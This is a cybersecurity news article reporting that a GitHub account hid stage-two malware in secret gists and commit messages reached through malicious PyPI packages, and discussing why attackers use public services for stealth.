Researchers have come across a GitHub account abusing two unique features of the site to host stage-two malware.
Hackers have increasingly been repurposing public services as headquarters for their misdeeds - housing malware in public code repositories or file-sharing services, and performing command-and-control from messaging apps.
Sometimes they get even more creative, utilizing software-as-a-service platforms in ways you'd never be able to guess.
Continuing this tradition is yeremyvalidslov2342, an individual connected with multiple malicious packages identified by ReversingLabs on Dec. 19.
New Ways of Abusing GitHub for Cyber Gain The most common way cybercriminals will abuse public code repositories is by simply publishing their malicious files to throwaway accounts.
It's obvious yet crude, as administrators work to identify and take down such accounts as soon as they're spotted.
Yeremy took a more circuitous approach, first publishing a series of packages to the Python Package Index, another oft-abused repo.
Gists are a kind of lite version of Git repositories, designed to allow coders to store and share snippets of code without having to set up entire projects around them.
The secret gist inside of the PyPI packages contained stage-two malware.
The researchers were only able to find one other use of gists for such a purpose, buried in a 2019 Trend Micro report about a Slack backdoor.
Yeremy was also connected to one other PyPI package with a malicious setup file.
This time upon execution, the package cloned an existing, most likely legitimate, PySocks project from GitHub.
Instead of being within the repo itself, in this case, the malware was hidden inside of the commit message describing it.
How Public Services Help Hackers Carrying out cyberattacks from one's own infrastructure does offer a certain degree of resiliency from account takedowns, but using shared and open source resources has the advantage of stealth.
Public software services also offer a host of extra upsides for bad guys.
It's quicker, easier, and cheaper to create an account on a popular website than it is to arrange traditional infrastructure.
The company supporting the site handles maintenance and uptime, and they're typically very reliable.
Traffic to popular sites elicits far less suspicion than does traffic to unknown servers in far-off countries.
This Cyber News was published on www.darkreading.com. Publication date: Tue, 19 Dec 2023 12:30:19 +0000